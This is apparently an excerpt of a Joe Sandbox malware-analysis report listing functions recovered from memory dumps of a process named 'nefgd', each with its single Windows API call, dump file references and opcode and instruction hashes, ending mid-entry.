Instruction ID: bcc2f6082dc2763f6e2bf31633ecd20615846f1e810dda1dd66bdd28ec3c91e4
Opcode Fuzzy Hash: ba5338655ec9e9dd27d4295eeb197fad11d22736a8ceb156b27d52ff47bbe865
Instruction Fuzzy Hash: E621AC71409380AFDB22CF60C884A92BFF4FF0A210F0984DEE9858B563D371A919DB61

Function 0174B70E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0174B788

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e2dab4d4faf6eae0194f4201181aa3d77f524887ca76d88429bffbfd9f831e7f
Instruction ID: 8db3ac80f032612358223786147bf688db6493cf38a4adc536603b3b833932df
Opcode Fuzzy Hash: e2dab4d4faf6eae0194f4201181aa3d77f524887ca76d88429bffbfd9f831e7f
Instruction Fuzzy Hash: 2721C075200204AFE722CF15CC80FA6FBECEF04614F08849AEA45CBA52D760E848CAB1

Function 061209F6 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 06120A61

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 10b2ccd61d49cdc610e2254f42ea6bc9af722c6243d17dbf033770398a21d61b
Instruction ID: fc335773bb366a9a79e479b3f4ce787297813b4049972b8751a52370be4224dd
Opcode Fuzzy Hash: 10b2ccd61d49cdc610e2254f42ea6bc9af722c6243d17dbf033770398a21d61b
Instruction Fuzzy Hash: 8421D571504240AFE710DF65CC45B66FBE8EF08324F04896AED458B791D375E419CB76

Function 0612043E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 061204AA

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: e7627ea07d82491eff7ecbbeba8d628a60bd1845769d9400dcef51cdfeea921e
Instruction ID: cbf6d4622287956ac9526207b6390755e387789757205d64ca7443facbef8e53
Opcode Fuzzy Hash: e7627ea07d82491eff7ecbbeba8d628a60bd1845769d9400dcef51cdfeea921e
Instruction Fuzzy Hash: D121D471504240AFE721CF55DC45B66FBE8EF08324F04895EED454B651C375E419CB72

Function 06120AF6 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 06120B6A

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: d4ad70e25e860df934f6da227005bdd1af9a2ca03b621aab242e833834b9a2fc
Instruction ID: be2797893a6e42f70e0d8ec5fd6f5983f327d60d601fadf58cf763b8c88d9450
Opcode Fuzzy Hash: d4ad70e25e860df934f6da227005bdd1af9a2ca03b621aab242e833834b9a2fc
Instruction Fuzzy Hash: 7221F071404244AFE721CF55CC84FAAFBE8EF08228F048959EA858BB51D375E45DCBB6

Function 06120344 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 061203C9

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: d062732cb00b7a7cf8d86cb88b5cd169e73c5753ca166c141d8bb0c7348a13ab
Instruction ID: a97f29e377a554e912e300b010985656d554d8ad394df98986589491c09f1997
Opcode Fuzzy Hash: d062732cb00b7a7cf8d86cb88b5cd169e73c5753ca166c141d8bb0c7348a13ab
Instruction Fuzzy Hash: 3D21C67150D3C06FC312CB25CC51B66BFB4EF87620F0981DBD8848B693D225B919C7A2

Function 061227DA Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0612283E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: e9ad53626bf08a3d34093782e5f40ddbbb5760032cbb548f44084161dbe2653e
Instruction ID: 1a59b70193dc4663f4d9931345f03c5128185e88f8a296ddb89a5b1efa6e6609
Opcode Fuzzy Hash: e9ad53626bf08a3d34093782e5f40ddbbb5760032cbb548f44084161dbe2653e
Instruction Fuzzy Hash: EB11E171604205AFE720CF55DC84FAABBE8EF04320F04846AED45CB691D374E918CAB1

Function 061216EA Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 0612174D

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: e4cad0372ad99d1c5d80218c5b3de41e056a1368983f6282f05b37a6dc658212
Instruction ID: 0e66e77ce74deb624844b6b6528a836f711837901c03f9646e4a70f07701ff3e
Opcode Fuzzy Hash: e4cad0372ad99d1c5d80218c5b3de41e056a1368983f6282f05b37a6dc658212
Instruction Fuzzy Hash: 0611D071504244BEEB21DF50DC85BBAFBACEF44224F04886AEE448B641D374A80D8AB1

Function 0174A73E Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 0174A7BD

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 7a854568fa7e9f19b999e5f82613af674c2208f01cf6a24558d7c2cdcf9391d4
Instruction ID: d88d3c242f28d2773afe5b60efcceb3f1f4ad2951fa249848a8164fd7abe4590
Opcode Fuzzy Hash: 7a854568fa7e9f19b999e5f82613af674c2208f01cf6a24558d7c2cdcf9391d4
Instruction Fuzzy Hash: A811E9715493806FD3118B15DC41F72FFB8EF86620F15819AEC488BA82D225B91AC7B6

Function 06126445 Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 061264BD

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 53b188ec075026f12447a1cdbc29b9fcac3ce71c4d0b882f0ccf3fb0b5423f23
Instruction ID: 62874212304b22ea9dbdd2367b54413fb5f34cbbfae338a0cd92124cb2e9b4ce
Opcode Fuzzy Hash: 53b188ec075026f12447a1cdbc29b9fcac3ce71c4d0b882f0ccf3fb0b5423f23
Instruction Fuzzy Hash: 6521AE765097C09FDB128F25CC54B52BFB4EF17220F0D84DEE9C58B6A3C265A858CB61

Function 061218EE Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06121958

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 89565144ba616214f1b85c0c3d6bdd7654c44d27b8648b30e952cf9250e9f326
Instruction ID: 8bed5327102bc4f1259e7bf178ce0d1a1a685a77ebeb96cc6de84682c680ba92
Opcode Fuzzy Hash: 89565144ba616214f1b85c0c3d6bdd7654c44d27b8648b30e952cf9250e9f326
Instruction Fuzzy Hash: FA110072504245AFEB21CF51CC84FAAFBECEF04324F04886AEA458BA41D334E41D8BB5

Function 0612075A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061207CC

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e455e5f7c3efdf3f9b09402f656121cf0691672cff3f775e51df787f6e29e2d8
Instruction ID: 0d8291f3f2eb9409fa6d35a2e5b665722b190d922ea3af165880a7dd7ce74383
Opcode Fuzzy Hash: e455e5f7c3efdf3f9b09402f656121cf0691672cff3f775e51df787f6e29e2d8
Instruction Fuzzy Hash: C911D372500604AFE721CF55CC84FA7F7ECEF08720F04855AE9858BA51D760E859CBB5

Function 06125DD5 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 06125E51

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 4ac5e28e4c77550034c8bbd87610bdbe3f5f59db1f05af145d42871aac9e2e67
Instruction ID: 302aa5b187c0af62bfd31a356ff0b98128359d370aab647f48053a4d43c5ae81
Opcode Fuzzy Hash: 4ac5e28e4c77550034c8bbd87610bdbe3f5f59db1f05af145d42871aac9e2e67
Instruction Fuzzy Hash: 652193B55093806FD7628F15DC84B62FFF8EF06614F08808AED848B293D365E919CB71

Function 0612106A Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061210C9

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: d27cc2e2eb614c7781b2f9aad6ec5531ff6d05986f5426ab854b0fb3a1124486
Instruction ID: 8880e70933eb54d689220c13e3e88111bf635a08c504ef1377338b7af74f1d7d
Opcode Fuzzy Hash: d27cc2e2eb614c7781b2f9aad6ec5531ff6d05986f5426ab854b0fb3a1124486
Instruction Fuzzy Hash: 13112672504244AFEB21CF51CC41FAAFBE8EF04320F04846AEE45CBA51C330E4598BB5

Function 06120324 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 061203C9

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 4cd2cf4c7f3079fc568421f3e0b81405511e74384493535319eb2e97db0aa1b9
Instruction ID: 50170113414c28231cd6ace3c0c4d702e88de756f6ec839c33ca2dc4b2a2049e
Opcode Fuzzy Hash: 4cd2cf4c7f3079fc568421f3e0b81405511e74384493535319eb2e97db0aa1b9
Instruction Fuzzy Hash: F811B6715087806FC312CB25CC55B62FFB4FF8B624F09819AE9448BA93D625B915C7A2

Function 06121DC0 Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06121E38

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 8bacd3e841983d5acc179a3c88eefdae4e8d62d9bdb20a4bcad940ce515f8cce
Instruction ID: ab2177c45f7e27f105e5cce3a52afcf33de717a7c2d666dffc23c0c3e93244cd
Opcode Fuzzy Hash: 8bacd3e841983d5acc179a3c88eefdae4e8d62d9bdb20a4bcad940ce515f8cce
Instruction Fuzzy Hash: A811E6715093846FD722CF11CC45FA6FFB8EF46620F0884DAEA448B692C364A948CBB5

Function 06123C4A Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06123CA6

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 58dc1854faa6082204bc6bb253254bb14534a89c8d70749ca9203fda2a22811c
Instruction ID: 1e3cc24b2bec7a7e03b34eed916ecdbb9d740d275fef3303cab0a04c40e582a4
Opcode Fuzzy Hash: 58dc1854faa6082204bc6bb253254bb14534a89c8d70749ca9203fda2a22811c
Instruction Fuzzy Hash: 9F11E271604255AFEB20CF54DC84FAAFBA8EF04724F04846BED458BA41D375E8198BB5

Function 061226F2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0612274E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 258880957876887bdbd4d8b7a2160341d48b6740a505cea09a20edfd80a37c6d
Instruction ID: 395fde95d4a7bec48810f9f361101d4b15c39ec6f32ff100e242218e402fbf94
Opcode Fuzzy Hash: 258880957876887bdbd4d8b7a2160341d48b6740a505cea09a20edfd80a37c6d
Instruction Fuzzy Hash: 01113471604204AFEB21CF64CC40BAAFBE8EF04320F04846AED458BA40C374E518CBB1

Function 0612050D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 06120580

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: cd57a52f0bb9a43fc9e3a0cc7e9e362308009a80d8b54916602963d1e75537da
Instruction ID: 46db2a52e485ee54aa531a0057c8e9b1e3bb4fca5d36d1bae466514cea30f2da
Opcode Fuzzy Hash: cd57a52f0bb9a43fc9e3a0cc7e9e362308009a80d8b54916602963d1e75537da
Instruction Fuzzy Hash: 5F218B715093C0AFDB128F61DC44B52BFB4EF07220F0989DAE9858F163C325A459CB62

Function 0612153A Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0612159E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: d93a8996a7d966024567aa6e34858b570a3af05ada4b8873238197797627dd0e
Instruction ID: 8ea4de07b784d5af02adea47c93193fc37febc5e0c59d2ec11868e437a5ac812
Opcode Fuzzy Hash: d93a8996a7d966024567aa6e34858b570a3af05ada4b8873238197797627dd0e
Instruction Fuzzy Hash: FE11E2B2504244AFE721CF51CC85FAAF7ECEF05324F0484AAEA458BA41D734E5098BB5

Function 0582B919 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0582B93C

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4eff70544df1db2f59ca826b886c76297d65df040b7e5c4f5115fb5f442a1a76
Instruction ID: f76d5dd9ff158cebbbd26eeee48212e7a2cb29c7e23659e9908237088b4dff4a
Opcode Fuzzy Hash: 4eff70544df1db2f59ca826b886c76297d65df040b7e5c4f5115fb5f442a1a76
Instruction Fuzzy Hash: 9F211270901629DFDB25DF14C9887AABBB2BF44315F1184E5D809EB241CB79AEC1CF41

Function 0612563C Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 061256A7

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 5e44b1d16c2d93e95353202d51215513cab848f3c524487571c20c479f681f5f
Instruction ID: be154faae73349efc1e902fe50db7f32ebf200131b8fdb7cfb7d2e47733f5db9
Opcode Fuzzy Hash: 5e44b1d16c2d93e95353202d51215513cab848f3c524487571c20c479f681f5f
Instruction Fuzzy Hash: 5B11BE715093C59FD7228F25DC85A62BFB8EF02220F0980DAEC858F262D265E858CB71

Function 061244AE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06124504

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 1ca90bd42b0ba396739775bd0ffcd854c2184d79108a7fb40d1a38cc66eda413
Instruction ID: 3bedc57c27a1fb8b86a2d560e01d8d5b210cf31c1caa879231730c1155f1eb8e
Opcode Fuzzy Hash: 1ca90bd42b0ba396739775bd0ffcd854c2184d79108a7fb40d1a38cc66eda413
Instruction Fuzzy Hash: 0A11E371604245AFEB10CF55DC84BAABBE8EF04624F0484AAED45CFA41D774E8498AA5

Function 06122CF2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06122D66

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8c763126da941fdc8ee5657d169b5a48c52285885f421bf19caf5302c8a1825d
Instruction ID: ef43fde1b4e3873e96852615dc760156a9f8a4332cce80f6df8f7e6fa523e71e
Opcode Fuzzy Hash: 8c763126da941fdc8ee5657d169b5a48c52285885f421bf19caf5302c8a1825d
Instruction Fuzzy Hash: 6B219D31549780AFCB228F61CC44A52BFF4EF06320F0889DEED858B562C376A419CB62

Function 06122F62 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06122FB8

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 1ca90bd42b0ba396739775bd0ffcd854c2184d79108a7fb40d1a38cc66eda413
Instruction ID: d5e57f4580a2175d9e81326db52b2a17b390734307d949af20c5dd3bd02c6c98
Opcode Fuzzy Hash: 1ca90bd42b0ba396739775bd0ffcd854c2184d79108a7fb40d1a38cc66eda413
Instruction Fuzzy Hash: 66112371504245AFEB10CF14CC84BAAFBACEF04324F04846AED05CB681D774E9498AB5

Function 0174A2AE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,796C6D5E,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0174A30C

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 4d512643167577b27e574f32b802614969ba3a2ee00dd87ad7bc013577fe7b9c
Instruction ID: 7da7496626f32b52b46ef75889822ff1a0379a2a76ec722d236acc466e0d590a
Opcode Fuzzy Hash: 4d512643167577b27e574f32b802614969ba3a2ee00dd87ad7bc013577fe7b9c
Instruction Fuzzy Hash: A7114C7144E3C0AFD7138B259C54A62BFB4DF47620F0981DBED858F1A3D269A809DB72

Function 06120102 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06120161

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ef2bc62d73a0b2f5e25dacbf085cc26b528dde9ba3dd1cacda24013cf6f99f57
Instruction ID: 36021d24bc895be3e0431f4bcac0c04cb19cef95dd78b10a1245f82019f108b9
Opcode Fuzzy Hash: ef2bc62d73a0b2f5e25dacbf085cc26b528dde9ba3dd1cacda24013cf6f99f57
Instruction Fuzzy Hash: 4F11E271504204AFEB21CF50DC44FAAFBF8EF08324F04895AEE458BA51C331E4598BB5

Function 06124120 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,796C6D5E,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0612417C

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2b3db55b8bece73f14ff74dea2cc8066b0eeccd9eb49ca5cb751225dcd454448
Instruction ID: dbd141aad2688ea9eb5a3d06e2c72828ea32529f8a6aef88fc33c064ef50fe43
Opcode Fuzzy Hash: 2b3db55b8bece73f14ff74dea2cc8066b0eeccd9eb49ca5cb751225dcd454448
Instruction Fuzzy Hash: 641160715093819FD712CF25DC54B52BFF8EF46220F0884EAED85CB652D265E858CB62

Function 06123D32 Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06123D8E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: c412900da8ab2c40fe0a21f64504eb1387977f29ad12d479f0df8c41444adae0
Instruction ID: 4d60b8155cc28ef152c58b1cf2071a59c8c0cd14b29131a5e11072d5d98b8817
Opcode Fuzzy Hash: c412900da8ab2c40fe0a21f64504eb1387977f29ad12d479f0df8c41444adae0
Instruction Fuzzy Hash: 1E11E371504248AFEB21CF50DD84FAAFBA8EF44724F04885AED458BA41D375E4198BB5

Function 0612127E Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061212D7

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 032dfbc58ac7608215569807dc8b8e1829aaecf692ec15846912f833e6f6fbda
Instruction ID: ce1adc48fe6dcd7954390cd5cf19c6faa3915f9d5e8874adb338d13c565e1c98
Opcode Fuzzy Hash: 032dfbc58ac7608215569807dc8b8e1829aaecf692ec15846912f833e6f6fbda
Instruction Fuzzy Hash: BF1102B1904244AFEB21CF51CC85BAAFBE8EF05324F04846AEE459BA41C374A419CBB5

Function 061254ED Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 06125558

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 5c012c45324a78755e84fe25a97e14977e3c12814a495d8da95972859a82d946
Instruction ID: eaa60f0b8f560ec4afa475e09cc00e979c0910e896e5b318b78558fc5d5e8293
Opcode Fuzzy Hash: 5c012c45324a78755e84fe25a97e14977e3c12814a495d8da95972859a82d946
Instruction Fuzzy Hash: D5117F754093C0AFD7128B159C84661BFB4EF47624F0980DAED854F263D265A949CB62

Function 0582B910 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0582B93C

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5a0d52b888a29ca751494bdae5cfc3390b2e114c3df66a07fc13ee325403d78
Instruction ID: 2f2ba052d75070af1ee0bf4ddbe544da47f1d248338ced52547339fcc34ac7a8
Opcode Fuzzy Hash: b5a0d52b888a29ca751494bdae5cfc3390b2e114c3df66a07fc13ee325403d78
Instruction Fuzzy Hash: F821217090262ACFDB25CF14C944BAABBB2BF44305F1184E5D909EB241CB796EC1CF41

Function 06120EA2 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06120EF8

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: eb5a6360be5b065e3ca35185b383d05e99b0e7527e9b57775d238af07ad6f6f7
